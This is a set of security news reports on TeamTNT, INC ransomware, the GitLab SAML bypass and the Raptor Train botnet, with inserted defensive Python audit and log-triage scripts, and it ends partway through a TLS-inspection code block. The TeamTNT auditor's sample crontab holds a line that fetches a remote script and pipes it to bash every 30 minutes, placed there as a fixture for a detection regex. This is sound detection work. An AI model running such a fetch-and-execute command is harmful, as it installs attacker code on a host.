The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.
"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le Phuong said in a Wednesday report.
The malicious script, the Singaporean cybersecurity company noted, is responsible for disabling security features, deleting logs, terminating cryptocurrency mining processes, and inhibiting recovery efforts.
The attack chains ultimately pave the way for the deployment of the Diamorphine rootkit to conceal malicious processes, while also setting up persistent remote access to the compromised host.
The campaign has been attributed to TeamTNT with moderate confidence, citing similarities in the tactics, techniques, and procedures (TTPs) observed.
TeamTNT was first discovered in the wild in 2019, undertaking illicit cryptocurrency mining activities by infiltrating cloud and container environments. While the threat actor bid farewell in November 2021 by announcing a "clean quit," public reporting has uncovered several campaigns undertaken by the hacking crew since September 2022.
The latest activity linked to the group manifests in the form of a shell script that first checks whether the host was previously infected by other cryptojacking operations, after which it proceeds to impair device security by disabling SELinux, AppArmor, and the firewall.
"The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service," the researchers said. "If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service."
Besides killing all competing cryptocurrency mining processes, the script takes steps to execute a series of commands to remove traces left by other miners, terminate containerized processes, and remove images deployed in connection with any coin miners.
Furthermore, it establishes persistence by configuring cron jobs that download the shell script every 30 minutes from a remote server (65.108.48[.]150) and modifying the "/root/.ssh/authorized_keys" file to add a backdoor account.
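The artefacts described in this report (SELinux switched off, a cron job that re-fetches the script from a remote server on a short interval, an extra entry in /root/.ssh/authorized_keys, and a backdoor user with root privileges) are all readable from plain configuration files, so a host can be audited for them offline. The following added example, which is not Group-IB's tooling, runs those four checks over text that would normally come from the crontab, authorized_keys, /etc/passwd and /etc/selinux/config. Every input is a constructed sample; the address, user name and key blobs are placeholders, and the admin-maintained baseline of known key blobs is an assumption of the example.

```python
"""Audit a Linux host for the persistence artefacts the TeamTNT report lists.

Added example, not Group-IB's tooling: it checks crontab text for a remote
script fetched and piped into a shell on a short interval, authorized_keys
for keys outside an admin-kept baseline, /etc/passwd for extra UID-0 users,
and /etc/selinux/config for a non-enforcing mode. Every input below is a
constructed sample; the address and key blobs are placeholders.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "kind detail")

# Five schedule fields, then the command (system crontabs carry a user field
# first; it simply becomes part of the command text here).
CRON_LINE = re.compile(r"^\s*(?P<min>\S+)\s+(?P<hr>\S+)\s+\S+\s+\S+\s+\S+\s+(?P<cmd>.+)$")
# "curl|wget ... http(s)://... | sh|bash": download-and-execute in one line.
FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b[^|;]*https?://\S+.*\|\s*(?:ba)?sh\b")


def cron_period_minutes(minute_field, hour_field):
    """Period in minutes for '*/N * ...' or '* * ...' schedules, else None."""
    if hour_field != "*":
        return None
    if minute_field == "*":
        return 1
    if minute_field.startswith("*/") and minute_field[2:].isdigit():
        return int(minute_field[2:])
    return None


def audit_crontab(text):
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m and FETCH_AND_RUN.search(m["cmd"]):
            period = cron_period_minutes(m["min"], m["hr"])
            when = f"every {period} min" if period else f"at {m['min']} {m['hr']}"
            findings.append(Finding("cron_remote_fetch", f"{when}: {m['cmd']}"))
    return findings


def audit_authorized_keys(text, baseline_blobs):
    """Flag any key whose blob is not in the baseline the admins maintain."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Options such as "command=..." may precede the key type.
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            findings.append(Finding("ssh_key_malformed", line))
        elif parts[idx + 1] not in baseline_blobs:
            comment = " ".join(parts[idx + 2:]) or "<no comment>"
            findings.append(Finding("ssh_key_unknown", comment))
    return findings


def audit_passwd(text):
    """Any UID-0 account other than root is a root-level backdoor candidate."""
    return [Finding("uid0_account", f[0]) for f in
            (line.split(":") for line in text.splitlines())
            if len(f) >= 3 and f[2] == "0" and f[0] != "root"]


def audit_selinux(text):
    m = re.search(r"^\s*SELINUX=(\w+)", text, re.M)
    state = m.group(1).lower() if m else "unset"
    return [] if state == "enforcing" else [Finding("selinux_not_enforcing", state)]


def audit_host(crontab, authorized_keys, passwd, selinux_cfg, baseline_blobs):
    return (audit_crontab(crontab) + audit_authorized_keys(authorized_keys, baseline_blobs)
            + audit_passwd(passwd) + audit_selinux(selinux_cfg))


# Constructed samples (203.0.113.77 is a documentation address, blobs are dummies).
SAMPLE_CRONTAB = """# m h dom mon dow user command
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * curl -s http://203.0.113.77/x.sh | bash
"""
SAMPLE_KEYS = """ssh-ed25519 QUFBQWNvbnN0cnVjdGVkLWFkbWluLWtleQ== admin@bastion
ssh-rsa QUFBQWNvbnN0cnVjdGVkLWJhY2tkb29yLWtleQ==
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sysupdate:x:0:0::/root:/bin/bash
"""
SAMPLE_SELINUX = "SELINUX=disabled\nSELINUXTYPE=targeted\n"
BASELINE_BLOBS = {"QUFBQWNvbnN0cnVjdGVkLWFkbWluLWtleQ=="}

if __name__ == "__main__":
    for f in audit_host(SAMPLE_CRONTAB, SAMPLE_KEYS, SAMPLE_PASSWD, SAMPLE_SELINUX, BASELINE_BLOBS):
        print(f"{f.kind}: {f.detail}")
```

On a real host the four strings would be read from the files named above (plus each user's crontab), and the baseline of key blobs kept somewhere the host cannot rewrite. The cron check keys on the download-and-execute shape rather than a specific address, since the report notes the script re-fetches itself on a schedule; the period is reported so a 30-minute beacon stands out from a nightly maintenance job.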
"It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities," the researchers noted. "The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration."
Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector
19.9.24 Ransom The Hacker News
Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.
The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts shared on X.
In the next step, the attackers proceed to carry out lateral movement through Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.
The Windows maker said Vanilla Tempest has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida.
It's worth noting that the threat actor is also tracked under the name Vice Society, which is known for employing already existing lockers to carry out their attacks, as opposed to building a custom version of their own.
The development comes as ransomware groups like BianLian and Rhysida have been observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an attempt to evade detection.
"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.
GitLab Patches Critical SAML Authentication Bypass Flaw in CE and EE Editions
19.9.24 Vulnerability The Hacker News
GitLab has released patches to address a critical flaw impacting Community Edition (CE) and Enterprise Edition (EE) that could result in an authentication bypass.
The vulnerability is rooted in the ruby-saml library (CVE-2024-45409, CVSS score: 10.0), which could allow an attacker to log in as an arbitrary user within the vulnerable system. It was addressed by the maintainers last week.
The problem stems from the library not properly verifying the signature of the SAML Response. SAML, short for Security Assertion Markup Language, is a protocol that enables single sign-on (SSO) and exchange of authentication and authorization data across multiple apps and websites.
"An unauthenticated attacker with access to any signed SAML document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents," according to a security advisory. "This would allow the attacker to log in as arbitrary user within the vulnerable system."
It's worth noting the flaw also impacts omniauth-saml, which shipped an update of its own (version 2.2.1) to upgrade ruby-saml to version 1.17.
The latest patch from GitLab updates the dependencies omniauth-saml to version 2.2.1 and ruby-saml to 1.17.0. The fix is included in GitLab versions 17.3.3, 17.2.7, 17.1.8, 17.0.8, and 16.11.10.
As mitigations, GitLab is urging users of self-managed installations to enable two-factor authentication (2FA) for all accounts and disallow the SAML two-factor bypass option.
GitLab makes no mention of the flaw being exploited in the wild, but it has provided indicators of attempted or successful exploitation, suggesting that threat actors may be actively trying to capitalize on the shortcomings to gain access to susceptible GitLab instances.
"Successful exploitation attempts will trigger SAML related log events," it said. "A successful exploitation attempt will log whatever extern_id value is set by the attacker attempting exploitation."
"Unsuccessful exploitation attempts may generate a ValidationError from the RubySaml library. This could be for a variety of reasons related to the complexity of crafting a working exploit."
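The two log signals GitLab describes above (a successful forgery logging an attacker-chosen extern_id, a failed one raising a RubySaml ValidationError) can be turned into a simple triage pass over authentication logs. The script below is an added example, not GitLab's code; the JSON field names and the log lines are constructed for illustration and must be mapped to the real log schema of the instance being reviewed.

```python
"""Triage sketch for the GitLab / ruby-saml signature bypass (CVE-2024-45409).

GitLab's advisory notes that a successful exploitation attempt logs whatever
extern_id the attacker set, while unsuccessful attempts may surface as a
ValidationError from RubySaml. The log lines below are CONSTRUCTED for this
example; the JSON field names are an assumption, not GitLab's real schema.
"""
import json
from collections import Counter

# Constructed sample log lines (not real GitLab output).
SAMPLE_LOG = """\
{"time":"2024-09-19T10:00:01Z","event":"saml_login","extern_id":"alice@example.com","ip":"198.51.100.10","status":"success"}
{"time":"2024-09-19T10:00:09Z","event":"saml_login","extern_id":"root","ip":"203.0.113.7","status":"success"}
{"time":"2024-09-19T10:00:12Z","event":"saml_error","error":"ValidationError: Fingerprint mismatch","ip":"203.0.113.7"}
{"time":"2024-09-19T10:00:13Z","event":"saml_error","error":"ValidationError: Invalid Signature","ip":"203.0.113.7"}
{"time":"2024-09-19T10:00:14Z","event":"saml_error","error":"ValidationError: Invalid Signature","ip":"203.0.113.7"}
{"time":"2024-09-19T10:00:20Z","event":"saml_login","extern_id":"bob@example.com","ip":"198.51.100.11","status":"success"}
"""

# Identities the IdP is actually allowed to assert. In practice this is
# exported from the IdP; here it is a constructed allowlist.
KNOWN_EXTERN_IDS = {"alice@example.com", "bob@example.com"}


def parse_log(text):
    """Parse newline-delimited JSON, skipping blank or non-JSON lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def find_unknown_extern_ids(events, known):
    """Successful SAML logins whose extern_id the IdP never issued.

    A forged assertion carries an attacker-chosen extern_id, so any value
    outside the IdP's known population deserves a closer look.
    """
    return [e for e in events
            if e.get("event") == "saml_login"
            and e.get("status") == "success"
            and e.get("extern_id") not in known]


def count_validation_errors(events):
    """Count RubySaml ValidationError events per source IP."""
    counts = Counter()
    for e in events:
        if e.get("event") == "saml_error" and "ValidationError" in e.get("error", ""):
            counts[e.get("ip", "?")] += 1
    return counts


def triage(text, known=KNOWN_EXTERN_IDS, error_threshold=3):
    """Return suspicious logins and IPs producing repeated validation errors."""
    events = parse_log(text)
    unknown = find_unknown_extern_ids(events, known)
    errors = count_validation_errors(events)
    noisy_ips = sorted(ip for ip, n in errors.items() if n >= error_threshold)
    return {"unknown_extern_ids": [(e["extern_id"], e["ip"]) for e in unknown],
            "noisy_ips": noisy_ips}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LOG), indent=2))
```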
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, including a recently disclosed critical bug impacting Apache HugeGraph-Server (CVE-2024-27348, CVSS score: 9.8), based on evidence of active exploitation.
Federal Civilian Executive Branch (FCEB) agencies have been recommended to remediate the identified vulnerabilities by October 9, 2024, to protect their networks against active threats.
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide
19.9.24 IoT The Hacker News
Cybersecurity researchers have uncovered a never-before-seen botnet comprising an army of small office/home office (SOHO) and IoT devices that are likely operated by a Chinese nation-state threat actor called Flax Typhoon (aka Ethereal Panda or RedJuliett).
The sophisticated botnet, dubbed Raptor Train by Lumen's Black Lotus Labs, is believed to have been operational since at least May 2020, hitting a peak of 60,000 actively compromised devices in June 2023.
"Since that time, there have been more than 200,000 SOHO routers, NVR/DVR devices, network attached storage (NAS) servers, and IP cameras; all conscripted into the Raptor Train botnet, making it one of the largest Chinese state-sponsored IoT botnets discovered to-date," the cybersecurity company said in an 81-page report shared with The Hacker News.
The infrastructure powering the botnet is estimated to have ensnared hundreds of thousands of devices since its formation, with the network powered by a three-tiered architecture consisting of the following -
Tier 1: Compromised SOHO/IoT devices
Tier 2: Exploitation servers, payload servers, and command-and-control (C2) servers
Tier 3: Centralized management nodes and a cross-platform Electron application front-end referred to as Sparrow (aka Node Comprehensive Control Tool, or NCCT)
Bot tasks are initiated from Tier 3 "Sparrow" management nodes, routed through the appropriate Tier 2 C2 servers, and then sent to the bots themselves in Tier 1, which makes up the bulk of the botnet.
Some of the devices targeted include routers, IP cameras, DVRs, and NAS from various manufacturers such as ActionTec, ASUS, DrayTek, Fujitsu, Hikvision, Mikrotik, Mobotix, Panasonic, QNAP, Ruckus Wireless, Shenzhen TVT, Synology, Tenda, TOTOLINK, TP-LINK, and Zyxel.
A majority of the Tier 1 nodes have been geolocated to the U.S., Taiwan, Vietnam, Brazil, Hong Kong, and Turkey. Each of these nodes has an average lifespan of 17.44 days, indicating the threat actor's ability to reinfect the devices at will.
"In most cases, the operators did not build in a persistence mechanism that survives through a reboot," Lumen noted.
"The confidence in re-exploitability comes from the combination of a vast array of exploits available for a wide range of vulnerable SOHO and IoT devices and an enormous number of vulnerable devices on the Internet, giving Raptor Train somewhat of an 'inherent' persistence."
The nodes are infected by an in-memory implant tracked as Nosedive, a custom variant of the Mirai botnet, via Tier 2 payload servers explicitly set up for this purpose. The ELF binary comes with capabilities to execute commands, upload and download files, and mount DDoS attacks.
Tier 2 nodes, on the other hand, are rotated about every 75 days and are primarily based in the U.S., Singapore, the U.K., Japan, and South Korea. The number of C2 nodes has increased from approximately 1-5 between 2020 and 2022 to no less than 60 between June 2024 and August 2024.
These nodes are flexible in that they also act as exploitation servers to co-opt new devices into the botnet, payload servers, and even facilitate reconnaissance of targeted entities.
At least four different campaigns have been linked to the ever-evolving Raptor Train botnet since mid-2020, each of which is distinguished by the root domains used and the devices targeted -
Crossbill (from May 2020 to April 2022) - use of the C2 root domain k3121.com and associated subdomains
Finch (from July 2022 to June 2023) - use of the C2 root domain b2047.com and associated C2 subdomains
Canary (from May 2023 to August 2023) - use of the C2 root domain b2047.com and associated C2 subdomains, while relying on multi-stage droppers
Oriole (from June 2023 to September 2024) - use of the C2 root domain w8510.com and associated C2 subdomains
The Canary campaign, which heavily targeted ActionTec PK5000 modems, Hikvision IP cameras, Shenzhen TVT NVRs, and ASUS routers, is notable for employing a multi-layered infection chain of its own to download a first-stage bash script, which connects to a Tier 2 payload server to retrieve Nosedive and a second-stage bash script.
The new bash script, in turn, attempts to download and execute a third-stage bash script from the payload server every 60 minutes.
"In fact, the w8510.com C2 domain for [the Oriole] campaign became so prominent amongst compromised IoT devices, that by June 3, 2024, it was included in the Cisco Umbrella domain rankings," Lumen said.
"By at least August 7, 2024, it was also included in Cloudflare Radar's top 1 million domains. This is a concerning feat because domains that are in these popularity lists often circumvent security tools via domain whitelisting, enabling them to grow and maintain access and further avoid detection."
No DDoS attacks emanating from the botnet have been detected to date, although evidence shows that it has been weaponized to target U.S. and Taiwanese entities in the military, government, higher education, telecommunications, defense industrial base (DIB) and information technology (IT) sectors.
What's more, bots entangled within Raptor Train have likely carried out possible exploitation attempts against Atlassian Confluence servers and Ivanti Connect Secure (ICS) appliances in the same verticals, suggesting widespread scanning efforts.
The links to Flax Typhoon – a hacking crew with a track record of targeting entities in Taiwan, Southeast Asia, North America, and Africa – stem from overlaps in the victimology footprint, Chinese language use, and other tactical similarities.
"This is a robust, enterprise-grade control system used to manage upwards of 60 C2 servers and their infected nodes at any given time," Lumen said.
"This service enables an entire suite of activities, including scalable exploitation of bots, vulnerability and exploit management, remote management of C2 infrastructure, file uploads and downloads, remote command execution, and the ability to tailor IoT-based distributed denial of service (DDoS) attacks at-scale."
FBI Dismantles Massive Flax Typhoon Botnet
The U.S. Department of Justice (DoJ) on Wednesday announced the takedown of the Raptor Train botnet pursuant to a court-authorized law enforcement operation. It also attributed the Flax Typhoon threat actor to a publicly-traded, Beijing-based company known as Integrity Technology Group.
"The malware connected these thousands of infected devices into a botnet, controlled by Integrity Technology Group, which was used to conduct malicious cyber activity disguised as routine internet traffic from the infected consumer devices," the DoJ said.
The operation saw the attackers' infrastructure seized to issue disabling commands to the malware on infected devices, despite unsuccessful efforts made by the threat actors to interfere with the remediation action through a DDoS attack targeting the servers the Federal Bureau of Investigation (FBI) was using to carry out the court order.
"The company built an online application allowing its customers to log in and control specified infected victim devices, including with a menu of malicious cyber commands using a tool called 'vulnerability-arsenal,'" the DoJ said. "The online application was prominently labeled 'KRLab,' one of the main public brands used by Integrity Technology Group."
The botnet consisted of over 260,000 devices in June 2024, with victims scattered across North America (135,300), Europe (65,600), Asia (50,400), Africa (9,200), Oceania (2,400), and South America (800).
In total, more than 1.2 million records of compromised devices have been identified in a MySQL database hosted on a Tier 3 management server used to administer and control the botnet and C2 servers by means of the Sparrow application. Sparrow also contains a module to exploit computer networks through an arsenal of known and zero-day flaws.
Botnets like KV-Botnet and Raptor Train make for ideal proxies as they can be abused by the threat actors to conceal their identities while staging DDoS attacks or compromising targeted networks. They also tend to evade network security defenses given that the malicious activity is originating from IP addresses with good reputations.
"The Chinese government is going to continue to target your organizations and our critical infrastructure — either by their own hand or concealed through their proxies," FBI director Christopher Wray said, calling out Integrity Technology Group for carrying out intelligence gathering and reconnaissance for Chinese government security agencies.
"Ultimately, as part of this operation, we were able to identify thousands of infected devices, and, then, with court authorization, issued commands to remove the malware from them, prying them from China's grip."
Chinese Engineer Charged in U.S. for Years-Long Cyber Espionage Targeting NASA and Military
19.9.24 APT The Hacker News
A Chinese national has been indicted in the U.S. on charges of conducting a "multi-year" spear-phishing campaign to obtain unauthorized access to computer software and source code created by the National Aeronautics and Space Administration (NASA), research universities, and private companies.
Song Wu, 39, has been charged with 14 counts of wire fraud and 14 counts of aggravated identity theft. If convicted, he faces a maximum sentence of a jail term of 20 years for each count of wire fraud and a two-year consecutive sentence in prison for aggravated identity theft.
He was employed as an engineer at the Aviation Industry Corporation of China (AVIC), a Chinese state-owned aerospace and defense conglomerate founded in 2008 and headquartered in Beijing.
According to information listed on AVIC's website, it has "over 100 subsidiaries, nearly 24 listed companies, and more than 400,000 employees." In November 2020 and June 2021, the company and some of its subsidiaries became the subject of U.S. sanctions, barring Americans from investing in the company.
Song is said to have carried out a spear-phishing campaign that involved creating email accounts to mimic U.S.-based researchers and engineers, which were then utilized to obtain specialized restricted or proprietary software for aerospace engineering and computational fluid dynamics.
The software could also be used for industrial and military applications, including the development of advanced tactical missiles and aerodynamic design and assessment of weapons.
These emails, the U.S. Department of Justice (DoJ) alleged, were sent to employees at NASA, the U.S. Air Force, Navy, and Army, and the Federal Aviation Administration, as well as individuals employed in major research universities in Georgia, Michigan, Massachusetts, Pennsylvania, Indiana, and Ohio.
The social engineering attempts, which started around January 2017 and continued through December 2021, also targeted private sector companies that work in the aerospace field.
The fraudulent messages purported to be sent by a colleague, associate, friend, or other people in the research or engineering community, requesting prospective targets to send or make available source code or software that they had access to. The DoJ did not disclose the name of the software or the defendant's current whereabouts.
"Once again, the FBI and our partners have demonstrated that cyber criminals around the world who are seeking to steal our companies' most sensitive and valuable information can and will be exposed and held accountable," said Keri Farley, Special Agent in Charge of FBI Atlanta.
"As this indictment shows, the FBI is committed to pursuing the arrest and prosecution of anyone who engages in illegal and deceptive practices to steal protected information."
Coinciding with the indictment, the DoJ also unsealed a separate indictment against Chinese national Jia Wei, a member of the People's Liberation Army (PLA), for infiltrating an unnamed U.S.-based communications company in March 2017 to steal proprietary information relating to civilian and military communication devices, product development, and testing plans.
"During his unauthorized access, Wei and his co-conspirators attempted to install malicious software designed to provide persistent unauthorized access to the U.S. company's network," the DoJ said. "Wei's unauthorized access continued until approximately late May 2017."
The development comes weeks after the U.K. National Crime Agency (NCA) announced that three men, Callum Picari, 22; Vijayasidhurshan Vijayanathan, 21; and Aza Siddeeque, 19, pleaded guilty to running a website that enabled cybercriminals to bypass banks' anti-fraud checks and take control of bank accounts.
The service, named OTP.agency, allowed monthly subscribers to socially engineer bank account holders into disclosing genuine one-time-passcodes, or reveal their personal information.
The underground service is said to have targeted over 12,500 members of the public between September 2019 and March 2021, when it was taken offline after the trio were arrested. It's currently not known how much illegal revenue the operation generated during its lifespan.
"A basic package costing £30 a week allowed multi-factor authentication to be bypassed on platforms such as HSBC, Monzo, and Lloyds so that criminals could complete fraudulent online transactions," the NCA said. "An elite plan cost £380 a week and granted access to Visa and Mastercard verification sites."
North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware
18.9.24 APT The Hacker News
A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.
The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is also broadly called Lazarus Group or Diamond Sleet (formerly Zinc).
The threat actor has a history of targeting government, defense, telecommunications, and financial institutions worldwide since at least 2013 to collect strategic intelligence that furthers North Korean interests. It's affiliated with the Reconnaissance General Bureau (RGB).
The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.
"UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies," it said in a new analysis, adding it copies and modifies job descriptions according to their target profiles.
"Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees."
The attack chains, also known as Operation Dream Job, entail the use of spear-phishing lures to engage with victims over email and WhatsApp in an attempt to build trust, before sending across a malicious ZIP archive file that's dressed up as a job description.
In an interesting twist, the PDF file of the description can only be opened with a trojanized version of a legitimate PDF reader application called Sumatra PDF included within the archive to deliver MISTPEN by means of a launcher referred to as BURNBOOK.
It's worth noting that this does not imply a supply chain attack nor is there a vulnerability in the software. Rather the attack has been found to employ an older Sumatra PDF version that has been repurposed to activate the infection chain.
This is a tried-and-tested method adopted by the hacking group as far back as 2022, with both Mandiant and Microsoft highlighting the use of a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks.
It's believed that the threat actors likely instruct the victims to open the PDF file using the enclosed weaponized PDF viewer program to trigger the execution of a malicious DLL file, a C/C++ launcher called BURNBOOK.
"This file is a dropper for an embedded DLL, 'wtsapi32.dll,' which is tracked as TEARPAGE and used to execute the MISTPEN backdoor after the system is rebooted," Mandiant researchers said. "MISTPEN is a trojanized version of a legitimate Notepad++ plugin, binhex.dll, which contains a backdoor."
TEARPAGE, a loader embedded within BURNBOOK, is responsible for decrypting and launching MISTPEN. A lightweight implant written in C, MISTPEN is equipped to download and execute Portable Executable (PE) files retrieved from a command-and-control (C2) server. It communicates over HTTP with the following Microsoft Graph URLs.
Mandiant also said it uncovered older BURNBOOK and MISTPEN artifacts, suggesting that they are being iteratively improved to add more capabilities and allow them to fly under the radar. The early MISTPEN samples have also been discovered using compromised WordPress websites as C2 domains.
"The threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples," the researchers said.
Chrome Introduces One-Time Permissions and Enhanced Safety Check for Safer Browsing
18.9.24 Safety The Hacker News
Google has announced that it's rolling out a new set of features to its Chrome browser that gives users more control over their data when surfing the internet and protects them against online threats.
"With the newest version of Chrome, you can take advantage of our upgraded Safety Check, opt out of unwanted website notifications more easily and grant select permissions to a site for one time only," the tech giant said.
The improvements to Safety Check allow it to run automatically in the background, notifying users of the actions it has taken, such as revoking permissions for websites they no longer visit, and flagging potentially unwanted notifications.
It's also designed to notify users of security issues that need to be addressed, while automatically revoking notification permissions from suspicious sites identified by Google Safe Browsing.
"On Desktop, Safety Check will continue to notify you if you have any Chrome extensions installed that may pose a security risk to you, then bring you to the extensions page and show a summary panel with quick controls to remove them," Andrew Kamau, product manager of Chrome, said.
Safety Check, besides offering users the option to enable Google Safe Browsing protections, is also capable of warning if a username or password stored in the Google Password Manager was involved in a data breach, the search and advertising company added.
Some of the other key updates include the ability to unsubscribe from unwanted website notifications directly on the notifications drawer on both Pixel and Android devices, as well as grant one-time permissions for Chrome on Android and Desktop.
"With this feature, you can choose to grant select permissions — such as access to your camera or mic — to a site for one time only, helping you better manage your online privacy," Kamau said. "Once you leave the site, Chrome will revoke the permissions. The site won't be able to use those permissions until you explicitly grant them again."
GSMA Plans End-to-End Encryption for Cross-Platform RCS Messaging
18.9.24 Mobil The Hacker News
The GSM Association (GSMA), the governing body that oversees the development of the Rich Communications Services (RCS) protocol, on Tuesday, said it's working towards implementing end-to-end encryption (E2EE) to secure messages sent between the Android and iOS ecosystems.
"The next major milestone is for the RCS Universal Profile to add important user protections such as interoperable end-to-end encryption," Tom Van Pelt, technical director of GSMA, said.
"This will be the first deployment of standardized, interoperable messaging encryption between different computing platforms, addressing significant technical challenges such as key federation and cryptographically-enforced group membership."
The development comes a day after Apple officially rolled out iOS 18 with support for RCS in its Messages app, which comes with advanced features like message reactions, typing indications, read receipts, and high-quality media sharing, among others.
RCS, an improvement over the current SMS standard, is currently not end-to-end encrypted out of the box, prompting Google to implement the Signal protocol to secure RCS conversations on Android.
Earlier this year, Apple said it will work with GSMA members to integrate encryption. It's worth noting that the company's proprietary iMessage service is E2EE enabled.
"We look forward to continuing to collaborate across the mobile ecosystem to advance the RCS standard with interoperable end-to-end encryption to keep all RCS messages private and secure," Van Pelt said.
Google, last July, also revealed plans to build the Message Layer Security (MLS) protocol into its Messages app for Android in order to facilitate interoperability across messaging services and platforms.
As recently as this month, Meta detailed its approach to enable interoperability with third-party messaging services in WhatsApp and Facebook Messenger as part of its efforts to comply with the E.U. Digital Markets Act (DMA) while maintaining E2EE guarantees "as far as possible."
"Building third-party chats is technically challenging and preserving privacy and security is a shared responsibility," the social media company said. "We have already come a long way, but there is a lot more to build."
Patch Issued for Critical VMware vCenter Flaw Allowing Remote Code Execution
18.9.24 Vulnerability The Hacker News
Broadcom on Tuesday released updates to address a critical security flaw impacting VMware vCenter Server that could pave the way for remote code execution.
The vulnerability, tracked as CVE-2024-38812 (CVSS score: 9.8), has been described as a heap-overflow vulnerability in the DCE/RPC protocol.
"A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution," the virtualization services provider said in a bulletin.
The shortcoming is similar to two other remote code execution flaws, CVE-2024-37079 and CVE-2024-37080 (CVSS scores: 9.8), that VMware resolved in vCenter Server in June 2024.
Also addressed by VMware is a privilege escalation flaw in the vCenter Server (CVE-2024-38813, CVSS score: 7.5) that could enable a malicious actor with network access to the instance to escalate privileges to root by sending a specially crafted network packet.
Security researchers zbl and srs of team TZL have been credited with discovering and reporting the two flaws during the Matrix Cup cybersecurity competition held in China back in June 2024. They have been fixed in the below versions -
vCenter Server 8.0 (Fixed in 8.0 U3b)
vCenter Server 7.0 (Fixed in 7.0 U3s)
VMware Cloud Foundation 5.x (Fixed in 8.0 U3b as an asynchronous patch)
VMware Cloud Foundation 4.x (Fixed in 7.0 U3s as an asynchronous patch)
Broadcom said it's not aware of malicious exploitation of the two vulnerabilities, but has urged customers to update their installations to the latest versions to safeguard against potential threats.
"These vulnerabilities are memory management and corruption issues which can be used against VMware vCenter services, potentially allowing remote code execution," the company said.
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint advisory urging organizations to work towards eliminating cross-site scripting (XSS) flaws that threat actors could exploit to breach systems.
"Cross-site scripting vulnerabilities arise when manufacturers fail to properly validate, sanitize, or escape inputs," the government bodies said. "These failures allow threat actors to inject malicious scripts into web applications, exploiting them to manipulate, steal, or misuse data across different contexts."
Google Chrome Switches to ML-KEM for Post-Quantum Cryptography Defense
17.9.24 Safety The Hacker News
Google has announced that it will be switching from KYBER to ML-KEM in its Chrome web browser as part of its ongoing efforts to defend against the risk posed by cryptographically relevant quantum computers (CRQCs).
"Chrome will offer a key share prediction for hybrid ML-KEM (codepoint 0x11EC)," David Adrian, David Benjamin, Bob Beck, and Devon O'Brien of the Chrome Team said. "The PostQuantumKeyAgreementEnabled flag and enterprise policy will apply to both Kyber and ML-KEM."
The changes are expected to take effect in Chrome version 131, which is on track for release in early November 2024. Google noted that the two hybrid post-quantum key exchange approaches are essentially incompatible with each other, prompting it to abandon KYBER.
"The changes to the final version of ML-KEM make it incompatible with the previously deployed version of Kyber," the company said. "As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519."
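Because the old and new hybrid codepoints do not interoperate, a defender watching TLS traffic may want to know which one a given client advertises. The following is an added example, not Chrome or BoringSSL code: it parses the supported_groups and key_share extensions of a TLS 1.3 ClientHello and reports whether 0x6399 (Kyber768+X25519) or 0x11EC (ML-KEM768+X25519) is offered. The ClientHello bytes are constructed by a helper in the block; they are not captured Chrome traffic.

```python
"""Inspect which post-quantum hybrid groups a TLS ClientHello offers.

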